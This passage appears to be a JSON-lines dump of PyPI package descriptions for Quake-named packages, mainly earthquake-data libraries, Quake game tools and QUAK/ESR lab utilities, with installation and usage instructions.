earthquakeearthquake_magnitude(\u2018place\u2019)To get dataframe list of all recent earthquakes and their distance from placeearthquake_df(\u2018place\u2019)To get dataframe list of all recent earthquakes and their distance from place, where distance less than 5000\nearthquake_less_than(\u2018Tokyo\u2019, 5000)Check out how to use this libraryhttps://betterprogramming.pub/python-library-for-finding-nearest-earthquake-8c96f97c9ddbhttps://github.com/g00387822/quakeanalysisChange Log0.0.1 (03/06/2022)First Release0.0.2 (03/06/2022)Second Release0.0.3 (03/06/2022)Third Release0.0.4 (03/06/2022)Fourth Release0.0.5 (03/06/2022)Fifth Release0.0.6 (04/06/2022)Sixth Release0.0.7 (04/06/2022)Seventh Release0.0.8 (14/06/2022)Eigth Release0.0.9 (14/06/2022)Ninth Release0.1.0 (15/06/2022)Tenth Release0.1.1 (18/06/2022)Eleventh Release0.1.2 (18/06/2022)Twelfth Release0.1.3 (18/06/2022)Thirteenth Release0.1.4 (18/06/2022)Fourteenth Release0.1.5 (18/06/2022)Fifteenth Release0.1.6 (18/06/2022)Sixteenth Release0.1.7 (19/06/2022)Seventeenth Release"} +{"package": "quake-cli-tools", "pacakge-description": "quake-cli-toolsquake-cli-tools is a set of command line tools for creating Quake content.Installation$pipinstallquake-cli-toolsToolspak: Add files to a PAK file.unpak: Extract files from a PAK file.wad: Add file to a WAD file.unwad: Extract files from a WAD file.bsp2wad: Create a WAD file from a BSP file.qmount: Mount a PAK file as a drive.image2spr: Create an SPR from image files.spr2image: Extract frames from an SPR.bsp2svg: Create an SVG file from a BSP file.ContributingHave a bug fix or a new feature you'd like to see in quake-cli-tools? Send it our way! 
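Going back to the quakeanalysis helpers listed a little earlier, here is a short usage sketch. Only the function names come from that description; importing them as attributes of a quakeanalysis module, and the DataFrame being a pandas object, are assumptions.

# Hypothetical usage of the quakeanalysis helpers described above; the import
# style is an assumption, only the function names come from the description.
import quakeanalysis

print(quakeanalysis.earthquake_distance('Tokyo'))   # distance to the nearest recent earthquake
print(quakeanalysis.earthquake_place('Tokyo'))      # place name of that earthquake
print(quakeanalysis.earthquake_magnitude('Tokyo'))  # its magnitude

df = quakeanalysis.earthquake_df('Tokyo')           # DataFrame of recent earthquakes and distances
print(df.head())                                    # assumes a pandas DataFrame is returned

near = quakeanalysis.earthquake_less_than('Tokyo', 5000)  # only quakes closer than 5000
print(near)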
Please make sure you create an issue that addresses your fix/feature so we can discuss the contribution.Fork this repo!Create your feature branch:git checkout -b features/add-cool-new-toolCommit your changes:git commit -m 'Adding must have new tool!'Push the branch:git push origin features/add-cool-new-toolSubmit a pull request.Create anissue.LicenseMITSee thelicensedocument for the full text."} +{"package": "quakefeeds", "pacakge-description": "Python 3 tools for handling USGS earthquake data feeds.Thequakefeedspackage provides a classQuakeFeedthat captures data\nfrom a GeoJSON feed, given a valid severity level and time period.\nThe class provides some shortcuts for accessing data of interest within\nthe feed and provides other useful methods - e.g. one to generate a simple\nGoogle map plotting quake locations and magnitudes.The data feeds and a description of their GeoJSON format are available athttp://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.php.Examples of Use>>>fromquakefeedsimportQuakeFeed>>>feed=QuakeFeed(\"4.5\",\"day\")>>>feed.title'USGS Magnitude 4.5+ Earthquakes, Past Day'>>>feed.timedatetime.datetime(2015,4,16,19,18,39,tzinfo=datetime.timezone.utc)>>>len(feed)6>>>feed[0]{'properties':{'cdi':1,'tsunami':0,'alert':None,...}# full JSON data for first event in feed>>>feed.location(0)[26.8608,35.135]>>>feed.magnitude(0)6.1>>>feed.event_title(0)'M 6.1 - 47km SW of Karpathos, Greece'>>>feed.depth(0)20.86>>>feed.depths>>>list(feed.depths)[20.86,46.35,76.54,48.69,10,28.64]>>>map1=feed.create_google_map()>>>map2=feed.create_google_map(style=\"titled\")>>>feed.write_google_map(\"map.html\",style=\"titled\")ScriptsThe installation process will install some scripts in addition to thequakefeedspackage:quakemap, which plots earthquakes on a Google mapquakestats, which computes basic statistics for a feedDependenciesPython 3RequestsJinja2template engine (for map generation)docopt(for the scripts)InstallationUsepipto install the package, its scripts\nand their dependencies:pip install quakefeedsAlternatively, you can install from within the unpacked source distribution:python setup.py install(Note that this requires prior installation ofsetuptools.)If you don\u2019t want the scripts, copying thequakefeedsdirectory from\nthe source distribution to somewhere in your PYTHONPATH will suffice."} +{"package": "quakeflow", "pacakge-description": "quakeflow"} +{"package": "quakeformer", "pacakge-description": "No description available on PyPI."} +{"package": "quake-inverse-squareroot", "pacakge-description": "quake 3's fastest inverse square rootThis module is a port from Quake 3's inverse square root algorithm.InstallationGet yourself a C compiler (like gcc, clang or msvc)Runpython setup.py installEnjoy!BuildGet yourself a C compiler (like gcc, clang or msvc)Runpython setup.py build bdist_wheel sdistCheck thedistfolder for the wheel and source distributionDocumentationquake_inverse_sq.coarse_inv_sqrt(number: float) -> floatThis is fastest inverse square root algorithm. It is not as accurate as thequake_inverse_sq.fined_inv_sqrtfunction, but it is much faster. It is implemented from thiswikipediaquake_inverse_sq.fined_inv_sqrt(number: float) -> floatThis is the original inverse square root algorithm. It is more accurate than thequake_inverse_sq.coarse_inv_sqrtfunction, but it is slower. It is implemented frommath.h"} +{"package": "quakeio", "pacakge-description": "quake-ioQuakeIO is a library of utilities for parsing ground motion files. 
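A small usage sketch for the quake-inverse-squareroot functions documented just above. The module name quake_inverse_sq and both function names are taken verbatim from that description; the expectation that both results land near 0.5 for an input of 4.0 follows from them being inverse square roots.

# Usage sketch based on the documented quake_inverse_sq API above.
import quake_inverse_sq

x = 4.0
fast = quake_inverse_sq.coarse_inv_sqrt(x)  # fast, less accurate inverse square root
fine = quake_inverse_sq.fined_inv_sqrt(x)   # slower, more accurate variant
print(fast, fine)  # both should be close to 0.5 for x = 4.0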
Interfaces are provided for Python, Matlab, and the command line.InstallFormatsPython APIFormatsFormatReadWriteReference[quakeio.]json\u2611\u2611schemacsmip\u2610\u2610csmip.v2\u2611\u2610CSMIPeqsig\u2611\u2611eqsigPEER.NGA\u2611\u2610plain.tsv\u2610\u2610opensees\u2610\u2611plain.csv\u2610\u2610mdof\u2610\u2610SimCenter.Event\u2610\u2610InstallRun the following command:pipinstallquakeio"} +{"package": "quakemigrate", "pacakge-description": "QuakeMigrateis a Python package for automatic earthquake detection and location using waveform migration and stacking.Key FeaturesQuakeMigrate uses a waveform migration and stacking algorithm to search for coherent seismic phase arrivals across a network of instruments. It produces\u2014from raw data\u2014catalogues of earthquakes with locations, origin times, phase arrival picks, and local magnitude estimates, as well as rigorous estimates of the associated uncertainties.The package has been built with a modular architecture, providing the potential for extension and adaptation at numerous entry points. This includes, but is not limited to:the calculation or import of traveltime gridsthe choice of algorithm used to identify phase arrivals (for example by kurtosis, cross-covariance analysis between multiple components, machine learning techniques and more)the stacking function used to combine onset functionsthe algorithm used to perform phase pickingDocumentationDocumentation for QuakeMigrate is hostedhere.InstallationDetailed installation instructions can be foundhere.If you're comfortable with virtual environments and just want to get started, QuakeMigrate is available via the Python Package Index, and can be installed via pip:pip install quakemigrateUsageWe are working on tutorials covering how each individual aspect of the package works, as well as example use cases where we provide substantive reasoning for the parameter choices used. These examples include applications to cryoseismicity and volcano seismology.This is a work in progress -see our documentation for full details.Examples you can run in your browserTo quickly get a taste for how the software works, try out the two icequake examples hosted on Binder:Icequakes at the Rutford Ice Stream, AntarcticaIcequakes at the Skei\u00f0ar\u00e1rj\u00f6kull outlet glacier, IcelandAnd for a more comprehensive demonstration of the options available, see thetemplate scripts.CitationIf you use this package in your work, please cite the following conference presentation:Winder, T., Bacon, C.A., Smith, J.D., Hudson, T., Greenfield, T. and White, R.S., 2020. QuakeMigrate: a Modular, Open-Source Python Package for Automatic Earthquake Detection and Location. In AGU Fall Meeting 2020. AGU.as well as the relevant version of the source code onZenodo.We hope to have a publication coming out soon:Winder, T., Bacon, C.A., Smith, J.D., Hudson, T.S., Drew, J., and White, R.S. QuakeMigrate: a Python Package for Automatic Earthquake Detection and Location Using Waveform Migration and Stacking. (to be submitted to Seismica).Contributing to QuakeMigrateContributions to QuakeMigrate are welcomed. Whether you have identified a bug or would like to request a new feature, your first stop should be to reach out, either directly or\u2014preferably\u2014via the GitHub Issues panel, to discuss the proposed changes. 
Once we have had a chance to scope out the proposed changes you can proceed with making your contribution following the instructions in ourcontributions guidelines.Bug reports, suggestions for new features and enhancements, and even links to projects that have made use of QuakeMigrate are most welcome.ContactYou can contact us directly at:quakemigrate.developers@gmail.comAny additional comments/questions can be directed to:Tom Winder-tom.winder@esc.cam.ac.ukConor Bacon-conor.bacon@cantab.netLicenseThis package is written and maintained by the QuakeMigrate developers, Copyright QuakeMigrate developers 2020\u20132023. It is distributed under the GPLv3 License. Please see theLICENSEfile for a complete description of the rights and freedoms that this provides the user."} +{"package": "quakephase", "pacakge-description": "No description available on PyPI."} +{"package": "quaker", "pacakge-description": "QuakerDocsQuakerDocs is a modern and reliable static documentation generator. It\nwas designed from the ground up to replace older documentation\ngenerators. It generates a fully static web page with your\ndocumentation, so it can work without a server. Some of the features\nthat QuakerDocs has are:Fast generation of a static websiteWrite documentation using reStructuredTextSuper-fast live searchHandy bookmarking systemEasily configurableOnly takes one command!Getting Started with QuakerDocsQuakerDocs is very easy to use, and you do not need a lot to get\nstarted!InstallationFirst of all, make sure you have Clang and the LLVM wasm-compiler installed.For example, on Ubuntu:apt install clang lldThen, to install the QuakerDocs application use the following command:pip install quakerAfter running this command all the requirements are installed and you can\nimmediately use the quaker command.QuickstartTo create an example quickstart project in a directory, you can use the\nfollowing command:quaker --init This command creates a directory with some of the necessary files to get\nyou started such asconf.py, andindex.rst.UsageTo use QuakerDocs to turn your RST or Markdown files into static\nwebpages you need the follow these steps:Open the directory containing yourconf.pyin the terminal.cd path/to/my/project/To convert your documentation files into static webpages, run the\nfollowing command.quaker .Change into thebuild/directory, and start a webserver.cd build/\npython3 -m http.serverTo visit the generated documentation page visitlocalhost:8000in\nyour web browser."} +{"package": "quaker-db", "pacakge-description": "QuakerLightweight python API to USGS earthquake dataset.API Docs are located hereInstallationClone the repo to your system and install$gitclonehttps://github.com/BlakeJC94/quaker.git\n$cdquaker\n$pipinstall.QuickstartThis package comes equipped with a batteries-included CLI interface for downloading the latest\nearthquake event data in CSV, GeoJSON, and plain text format from the USGS database.usage: quaker [-h] [--format VAL] [--endtime TIME] [--starttime TIME] [--updatedafter TIME] [--minlatitude LAT]\n [--minlongitude LNG] [--maxlatitude LAT] [--maxlongitude LNG] [--latitude LAT] [--longitude LNG]\n [--maxradius VAL] [--maxradiuskm DIST] [--catalog VAL] [--contributor VAL] [--eventid VAL]\n [--includeallmagnitudes BOOL] [--includeallorigins BOOL] [--includedeleted VAL]\n [--includesuperceded BOOL] [--limit VAL] [--maxdepth VAL] [--maxmagnitude VAL] [--mindepth VAL]\n [--minmagnitude VAL] [--offset VAL] [--orderby VAL] [--alertlevel VAL] [--callback VAL]\n [--eventtype VAL] [--jsonerror 
BOOL] [--kmlanimated BOOL] [--kmlcolorby VAL] [--maxcdi VAL]\n [--maxgap VAL] [--maxmmi VAL] [--maxsig VAL] [--mincdi VAL] [--minfelt VAL] [--mingap VAL]\n [--minsig VAL] [--producttype VAL] [--productcode VAL] [--reviewstatus VAL]\n [mode]\n\nAccess USGS Earthquake dataset API Docs: https://earthquake.usgs.gov/fdsnws/event/1/ NOTE: All times use\nISO8601 Date/Time format (yyyy-mm-ddThh:mm:ss). UTC is assumed. NOTE: Minimum/maximum longitude values may\ncross the date line at 180 or -180\n\npositional arguments:\n mode action to perform (default: download)\n\noptional arguments:\n -h, --help show this help message and exit\n\nFormat:\n --format VAL specify the output format (one of \"csv\", \"geojson\", \"kml\", \"quakeml\", \"text\", or\n \"xml\").\n\nTime:\n --endtime TIME limit to events on or before the specified end time.\n --starttime TIME limit to events on or after the specified start time.\n --updatedafter TIME limit to events updated after the specified time.\n\nLocation - rectangle:\n --minlatitude LAT limit to events with a latitude larger than the specified minimum [-90, 90].\n --minlongitude LNG limit to events with a longitude larger than the specified minimum [-360, 360].\n --maxlatitude LAT limit to events with a latitude smaller than the specified maximum [-90, 90].\n --maxlongitude LNG limit to events with a longitude smaller than the specified maximum [-360, 360].\n\nLocation - circle:\n --latitude LAT specify the latitude to be used for a radius search [-90, 90].\n --longitude LNG specify the longitude to be used for a radius search [-180, 180].\n --maxradius VAL limit to events within the specified maximum number of degrees from the geographic\n point defined by the latitude and longitude parameters [0, 180].\n --maxradiuskm DIST limit to events within the specified maximum number of kilometers from the geographic\n point defined by the latitude and longitude parameters [0, 20001.6].\n\nOther:\n --catalog VAL limit to events from a specified catalog.\n --contributor VAL limit to events contributed by a specified contributor.\n --eventid VAL select a specific event by id; event identifiers are data center specific.\n --includeallmagnitudes BOOL\n specify if all magnitudes for the event should be included.\n --includeallorigins BOOL\n specify if all origins for the event should be included.\n --includedeleted VAL specify if deleted products and events should be included. the value \"only\" returns\n only deleted events. values \"true\" or \"false\" are typecast to bool.\n --includesuperceded BOOL\n specify if superseded products should be included. 
this also includes all deleted\n products, and is mutually exclusive to the includedeleted parameter.\n --limit VAL limit the results to the specified number of events.\n --maxdepth VAL limit to events with depth less than the specified maximum.\n --maxmagnitude VAL limit to events with a magnitude smaller than the specified maximum.\n --mindepth VAL limit to events with depth more than the specified minimum.\n --minmagnitude VAL limit to events with a magnitude larger than the specified minimum.\n --offset VAL return results starting at the event count specified, starting at 1.\n --orderby VAL order the results (one of \"time\", \"time-asc\", \"magnitude\", or \"magnitude-asc\").\n\nExtensions:\n --alertlevel VAL limit to events with a specific pager alert level (one of \"green\", \"yellow\", \"orange\",\n or \"red\").\n --callback VAL convert geojson output to a jsonp response using this callback.\n --eventtype VAL limit to events of a specific type\n --jsonerror BOOL request json(p) formatted output even on api error results. (only for geojson format)\n --kmlanimated BOOL whether to include timestamp in generated kml, for google earth animation support.\n --kmlcolorby VAL how earthquakes are colored (one of \"age\", \"depth\").\n --maxcdi VAL maximum value for maximum community determined intensity reported by dyfi [0, 12].\n --maxgap VAL limit to events with no more than this azimuthal gap [0, 360].\n --maxmmi VAL maximum value for maximum modified mercalli intensity reported by shakemap [0, 12].\n --maxsig VAL limit to events with no more than this significance.\n --mincdi VAL minimum value for maximum community determined intensity reported by dyfi [0, 12].\n --minfelt VAL limit to events with this many dyfi responses.\n --mingap VAL limit to events with no less than this azimuthal gap [0, 360].\n --minsig VAL limit to events with no less than this significance.\n --producttype VAL limit to events that have this type of product associated.\n --productcode VAL return the event that is associated with the productcode.\n --reviewstatus VAL limit to events with a specific review status (one of \"all\", \"automatic\", or\n \"reviewed\").Runquaker downloadand specify the parameters as keyword arguments and pipe the output to any\nlocation:$quakerdownload--formatcsv--starttime2022-08-01--endtime2022-09-01>earthquake_data.csvFor more details on the available query parameters, usequaker --helpor view theUSGS documentation.Using the python API is also fairly straight-forward:>>>fromquakerimportQuery,Client>>>client=Client()# An empty query defaults to all events in the last 30 days>>>events_from_last_30_days=Query()>>>client.execute(events_from_last_30_days,output_file=\"./path/to/example/output_1.csv\")# Large multi-page queries can also be handled>>>events_from_last_5_months=Query(...format=\"csv\",...starttime=\"2022-05-01\",...endtime=\"2022-10-01\",...)>>>client.execute(events_from_last_5_months,output_file=\"./path/to/example/output_2.csv\")# Calling `client.execute` without an output file return results as a pandas DataFrame>>>results=client.execute(events_from_last_5_months)# You can filter results by location using the 
API>>>fields={...\"format\":\"csv\",...\"starttime\":\"2022-08-01\",...\"endtime\":\"2022-09-01\",...\"latitude\":35.652832,...\"longitude\":139.839478,...\"maxradiuskm\":120.0,...\"minmagnitude\":3.0,...}>>>events_in_august_in_120km_within_tokyo_above_mag_3=Query(**fields)>>>client.execute(...events_in_august_in_120km_within_tokyo_above_mag_3,...output_file=\"./path/to/example/output_3.csv\"...)# See `help(Query)` and https://earthquake.usgs.gov/fdsnws/event/1/ for more detailsContributingThis is a small personal project, but pull requests are most welcome!Code is styled using[black](https://github.com/psf/black)(pip install black)Code is linted withpylint(pip install pylint)Requirements are managed usingpip-tools(runpip install pip-toolsif needed)Add dependencies by adding packages tosetup.pyand runningpip-compileSemantic versioningis used in this repoMajor version: rare, substantial changes that break backward compatibilityMinor version: most changes - new features, models or improvementsPatch version: small bug fixes and documentation-only changesVirtual environment handling bypoetryis preferred:# in the project directory$poetryinstall\n$poetryshell"} +{"package": "quakerheritage", "pacakge-description": "quakerHeritageProject to support the collation of PDF data on the Quaker Meeting House Heritage Project into a databaseDependenciesRequired Python Libariesbs4numpypandaspdfplumberrequestsDisclaimerThis project has been specifically coded for the Quaker Meeting House Heritage Project, both in hard-coded variables, and hard-coded parameters for extracting text. It is a tool to suit a very specific use-case and may not work if used otherwise. The project further depends on the files required being listed online at the URLs provided. If Britain Yearly Meeting takes down the website and associated pdfs, back-ups are available on the Internet Archive's Wayback Machine. The code can also be adapted to work with locally downloaded pdfs. go to Appendix: Hosting Errors to note the required changes.Installationpip install quakerheritageHow-To UseSimply run the following command:python -m quakerheritage.buildYou will be prompted to select a location for the csv output to be placed. Once chosen, the code will run quietly in the background until complete, and the csv available at your chosen directory as 'quakerHeritageDB.csv'ContributingFeedback is both welcome and encouraged. If you use the code, or just find issues while browsing, please report them byclicking here.LicenceDistributed underAGPL version 3.0ContactFor queries please reach out via GitHub by either raising an issue or contacting me directly.https://github.com/aclayden"} +{"package": "quakesaver-client", "pacakge-description": "QuakeSaver ClientThis is the client for theQuakeSaverSensor services.You can find the documentationhere.Getting StartedSetting up the clientEMAILandPASSWORDcorrespond to the credentials you use to log in athttps://network.quakesaver.net.fromquakesaver_clientimportQSCloudClientEMAIL=\"user@yourorganisation.net\"PASSWORD=\"!verstrongpassword1\"client=QSCloudClient(email=EMAIL,password=PASSWORD)Example to stream from the cloudAuthenticate against the quakesaver server and download raw, as well as processed data.Please note, that for security reasons each login session is only valid for 15 minutes. 
Thus, the client is not designed for long-term connections but for repeated queries.\"\"\"Example script for quakesaver_client usage.\"\"\"importsysfromdatetimeimportdatetime,timedeltafrompprintimportppimportobspyfromobspyimportStreamfromquakesaver_clientimportQSCloudClientfromquakesaver_client.models.data_product_queryimportDataProductQueryfromquakesaver_client.models.measurementimportMeasurementQueryEMAIL=\"user@yourorganisation.net\"PASSWORD=\"!verstrongpassword1\"DATA_PATH=\"./data\"client=QSCloudClient(email=EMAIL,password=PASSWORD)# Get a list of all available sensor IDs:sensor_ids=client.get_sensor_ids()pp(sensor_ids)iflen(sensor_ids)==0:print(\"No sensors available\")sys.exit()# For demonstration, we use the first sensor in the listsensor_uid_to_get=sensor_ids[0]# Get the sensor from the clientsensor=client.get_sensor(sensor_uid_to_get)pp(sensor.dict())# Queries such as waveforms, station metadata and measurements (data products calculated# on the sensor)# require that you select a time window. We use that last 5 hours of dataend_time=datetime.utcnow()start_time=end_time-timedelta(hours=5)# Query various Measurements. In this case we calculate a rolling `mean` over 10 minutes# time windows.# Other `aggregators` are:# * None (default)# * max# * minquery=MeasurementQuery(start_time=start_time,end_time=end_time,interval=timedelta(minutes=10),aggregator=\"mean\",)result=sensor.get_jma_intensity(query)print(result)result=sensor.get_peak_ground_acceleration(query)print(result)result=sensor.get_spectral_intensity(query)print(result)result=sensor.get_rms_offset(query)print(result)# Query various Data Products. You can only get 100 results at once, which is why there# are limit and skip values. You can get data products from a specific time frame, by# specifying start and end times.end_time=datetime.utcnow()start_time=end_time-timedelta(hours=5)query=DataProductQuery(start_time=start_time,end_time=end_time,limit=100,skip=0,)result=sensor.get_event_records(query)print(result)result=sensor.get_hv_spectra(query)print(result)result=sensor.get_noise_autocorrelations(query)print(result)# Download station meta data as StationXML and store them in a local directory.file_path=sensor.get_stationxml(starttime=start_time,endtime=end_time,level=\"response\",location_to_store=DATA_PATH,)withopen(file_path,\"r\")asfile:print(file.read())# Download raw full waveforms from the sensor. 
Note that you can only query what is in# the sensor's ringbuffer (usually the last ~ 48 hours).file_path=sensor.get_waveform_data(start_time=start_time,end_time=end_time,location_to_store=DATA_PATH)# Read the file into obspy for further processing...stream:Stream=obspy.read(file_path)fortraceinstream.traces:print(trace.stats)QSLocalClientExamplesInteract with sensors on your local network using theQSLocalClient.Streaming Dataimportasynciofromquakesaver_clientimportQSLocalClientasyncdefrun():client=QSLocalClient()sensor=client.get_sensor(\"qssensor.local\")stream=sensor.get_waveform_stream()asyncforchunkinstream.start():print(chunk)asyncio.run(run())Downloading DataDownload the latest 10 minutes from a local sensor and write that into a file:importdatetimefromquakesaver_clientimportQSLocalClientclient=QSLocalClient()sensor=client.get_sensor(\"qssensor.local\")tmax=datetime.datetime.utcnow()tmin=tmax-datetime.timedelta(minutes=10)file_path=sensor.get_waveform_data(tmin,tmax)print(file_path)"} +{"package": "quakesranalysis-tspspi", "pacakge-description": "QUAK/ESR analysis utilityThis is work in progress.This repository contains a collection of classes and utilities to handle\nand work with QUAK/ESR data files.Installationpip install quakesranalysis-tspspiUpgradingpip install --upgrade quakesranalysis-tspspiUtilitiesquakesrplotThequakesrplotis capable of generating standard plots for single peak\nscans and 1D scans. Those include:iqmeanis just a standard plot of the mean values and standard deviations\nof all captured I/Q samples in scan, zero scan and differenceapmeancalculated amplitude and phase out of I/Q samples and plots\nthem for scan, zero scan and differencewndnoiseprovides a sliding window noise calculation by calculating the\nstandard deviation inside this configurable sliding window to show how noise\nchanges over time.offsettimeplots the offset of all three captured signal types over timeallancalculates the Allan deviation of the system for all samples points\nalong the main axis (frequency, B0, ...) as well as a worst case Allan deviationdecomposedecomposes the found signal, zero signal and difference signal\ninto a mixture of Gaussians (this can be inspected by settingdecomposedebug)mixfitdoes the same as decompose but for more different function types (Gaussian,\nCauchy, Difference of Gaussian, Difference of Cauchy, Constant, ...). Inspection\nof the fitting behaviour is also possible usingmixfitdebugmetricsoutputs collected metrics into a JSON data file. This should be\nrun at the end.All plots are stored along the source datafile and named with the same prefix.Example usage:quakesrplot -iqmean -apmean -wndnoise 10 -wndnoise 3 -offsettime -mixfit -allan *_peak.npzTo see a list of all supported features execute without arguments:quakesrplotWhen outputting debug plots fordecomposeormixfittheQtAggbackend\nofmatplotlibtends to crash sometimes. 
One can then launch the application using\na different backend such asTkAggon via theMPLBACKENDenvironment variable:env MPLBACKEND=tkagg quakesrplot -iqmean -apmean -wndnoise 10 -wndnoise 3 -offsettime -mixfitdebug -allan *_peak.npzquakesrsliceThequakesrsliceutility is capable of slicing nD scans (1D/2D scans)\ninto separate.npzfiles.Usage: quakesrslice [OPTIONS] FILENAMES\n\nSlices nD scans into single NPZs\n\nOptions:\n\\t--outdir DIRECTORY\n\\t\\tWrite all sliced NPZs into the specified output directory (setable\n\\t\\tonly once for all input files)quakesrfetchUsage: quakesrfetch [OPTIONS] FROMDATE [TODATE]\n\nFetches all NPZ and run files from QUAK/ESR runs from the configured\nmeasurement directory that are taken since the specified dates and times.\nIf no end date is specified all runs starting from the given timestamp will\nbe fetched.\n\nThe date and timestamps can be supplied either as\n\n\tYYYYMMDD\n\t\tWhen addressing a whole day\n\tYYYYMMDDHHMMSS\n\t\tWhen adressing a given date and time\n\nOptions:\n\t--outdir DIRECTORY\n\t\tWrite all fetched NPZs into the specified output directory\n\t--list\n\t\tAlso write a list of fetched NPZs onto standard output to be passed\n\t\tto an analysis tool\n\t--sshkey KEYFILE\n\t\tSpecified the SSH keyfile to use. It's assumed to be a passwordless (!)\n\t\tkeyfile ..."} +{"package": "quakesrrtdisplay-tspspi", "pacakge-description": "QUAK/ESR realtime data displayQuick and dirty visualization of data published by a specific experimental\nsetup via MQTTInstallationpip install quakesrrtdisplay-tspspiNote: On our experimental systems this is deployed automatically by\nJenkins also on updates.Default configurationThe connection dialog can be filled with default credentials. This\nis done by a~/.config/quakesrdisplay/connection.confthat contains\na simple JSON structure supplying the values (password also not encrypted):{\n \"broker\" : '127.0.0.1',\n \"port\" : '1883',\n \"user\" : 'someMQTTusername',\n \"password\" : 'anyPassword',\n \"basetopic\" : 'quakesr/experiment'\n}"} +{"package": "quakesrthorcam-tspspi", "pacakge-description": "QUAK/ESR ThorCam interfaceNote:Work in progressThis is a small Python service that runs on a Windows machine to which the\nThorCam is attached to provide a bridge into the control system that has\nbeen realized on an OpenSource platform - it exposes an MQTT interface for\nconfiguration of camera settings and queue configuration as well as event signalling\nand allows to transfer images taken using SFTP.Since the required .NET library to interface with the not so simple to handle\nclosed source ThorCam library this application only runs on Windows.Installationpip install quakesrthorcam-tspspiConfiguration fileMQTT sectionThe MQTT section configures thebroker,port,userandpasswordof the MQTT broker. Thebasetopicis a topic string\nthat gets prepended to every message and to every subscription.Currently this module subscribes to the following topics:triggerwill allow software triggering of the camera (currently not implemented)setrunsets the current run parameters. Those are a currentrunprefixwhich\nis a single string that gets prepended in front of every filename and an optional\nlist of strings calledrunsuffixthat are used instead of numbering the frames\nin consecutive order on each hardware trigger.exposure/setallows one to pass a message containing anexposure_msfield to\nupdate the exposure. 
The camera interrupts streaming and triggering operation during\nchanges.The camera publishes:raw/storedwhenever a new raw frame has been stored and uploaded to\nthe configured servers. It contains alocalfilenameand aimagefilename.\nThe local filename also includes the path on the camera server while the\nimage filename is just the filename without any path by itself.Camera sectionthorcamserialis able to specify the serial number of the camera that the service\nshould bind to. In case no serial is specified the first available camera is usedtriggeris an dictionary that is able to configure the default trigger\nsettings:hardwarecan betrueorfalsecountspecifies the number of frames to capture after the trigger has\ntriggered the camera. This has to be either 0 for continuous capture or\nan positive integer.exposurecan be used to set the default exposure (in milliseconds)Local file storageimagedirspecifies the directory where images should be stored locallyUpload configuration (SFTP)rawframesftpis a list of hosts to which the camera server should upload\ncaptured raw frames. Each entry is a dictionary that contains:hostspecifies the host to which the upload should be madeuserspecifies the SSH userdestpathis the path on the remote machine where the images should be storedkeyfilepoints to the SSH private key file that should be used for authenticationExample configuration file{\n\t\"mqtt\" : {\n\t\t\"broker\" : \"10.0.0.5\",\n\t\t\"port\" : \"1883\",\n\t\t\"user\" : \"YourMqttUser\",\n\n\t\t\"password\" : \"NONDISCLOSEDSECRETLONGSTRING\",\n\n\t\t\"basetopic\" : \"quakesr/experiment/camera/ebeam\"\n\n\n\t},\n\t\"thorcam\" : {\n\t\t\"trigger\" : {\n\t\t\t\"hardware\" : true,\n\t\t\t\"count\" : 1\n\t\t},\n\t\t\"exposure\" : 80\n\t},\n\t\"imagedir\" : \"c:\\\\temp\\\\\",\n\t\"rawframesftp\" : [\n\t\t{\n\t\t\t\"host\" : \"10.0.0.15\",\n\t\t\t\"user\" : \"camserv\",\n\t\t\t\"keyfile\" : \"c:\\\\users\\\\quak\\\\id_winselwolf\",\n\t\t\t\"destpath\" : \"/home/pi/measurements/data/images/\"\n\t\t}\n ]\n}Dependenciespaho-mqttis the Eclipse Paho MQTT Python client\nthat provides the interface to the MQTT broker (currently running on anRabbitMQinstance)thorcamis a wrapper around the .NET libraries\nsupplied for the ThorCam service.paramikois a pure Python SSHv2 implementation mainly\nused for file transfer in this application.Pillowis a python image library (PIL) clone\nthat's used to encode the images."} +{"package": "quakestats", "pacakge-description": "Quake StatsQuake 3 logs / Quake Live events processing project.Allows to retrieve, process, analyze, store and present Quake matches.The project doesn't aim to give global stats likeqlstatsit's rather meant to store statistics from some server group (server domain). The origins of Quake Stats come from a group of players who occasionally play together and want to keep track of their matches... 
and to have fun from some custom made medals (badges) :)OverviewSupported features:processing Quake 3 logs (log parsing, transforming to QL)processing Quake Live event streams (zmq listen on QL server stat endpoint)translating (to some extent) Quake 3 logs into Quake Live eventsanalysing matchesstoring matches in Database backend (Mongo DB)presenting match results through a web applicationSupported mods and game modesUnfortunately only OSP FFA from Quake 3 is well tested as it was the main use casemods- OSP (http://www.orangesmoothie.org/tourneyQ3A/index.html)- Quake Live - most of event processing is implemented- Edawn - requires 1.6.3+ (enchanced logging)- vanilla Q3 not supported (need workaround for missing ServerTime)- CPMA not supported (need workaround for missing ServerTime)modes- DUEL- FFA- CA - partially implemented- TDM- CTFCustom medalsAre described hereresources.jsExamplesThe stats are presented with fancy charts, custom medals, etc. See the examples below.Total badges/medals boardTotal kills & deathsSingle match Kill Death Ratio, Worst Enemy, Score over Time chartRequirementsPython 3.6+Instance of Mongo DB (pointed bysettings.py)Modern web browser (requires css grid-layout)How to setupIn order to setup the application you need to have python 3.6+ (virtualenv recommended) and an instance of mongo DB.InstallationInstall from pip packagepipinstallquakestatsInstall from source code (optional)Is also needed installquakestatspackage (in virtualenv if you are using it). To do that you could install it directlypipinstall-rrequirements.txt\npythonsetup.pyinstallConfiguration fileThe application is configured by settingQUAKESTATS_SETTINGSenvironment variable to path to configuration file.\nSee examplesettings.pyVerify if everything is properly set upQuake Stats provide a simple CLI with a command to verify an environmentquakestatsstatusExample output:(venv) [user@pc quakestats]$ quakestats status\napp -> version: 0.9.61\nsettings -> env var: /opt/quakestats/settings.py\nsettings -> RAW_DATA_DIR: /opt/quakestats/data\ndb -> ping: {'ok': 1.0}\nwebapp -> loadable: Quakestats webapp is loadableRun Quake Stats web appYou can setup Quake Stats web app with any websever you want (as long as it supports python, e.g. mod wsgi, uwsgi).\nThis documentation covers only running intwistedwebserverRun in twistd (example)You can launch Quake Stats web application usingtwistdwebserver. Just make sure to install twisted framework first.\nAlso make sure to use some recent version of twisted (tested with 18.7.0 installed by pip).pipinstalltwistedFLASK_APP=\"quakestats.web\";QUAKESTATS_SETTINGS=`pwd`/settings.py;twistdweb--wsgiquakestats.web.appUser/Admin guideSetup admin userAdmin user is used by web application to access some additional administrative operations. For now it's only setting map sizes. Just to have a list of recently used maps and their sizes. 
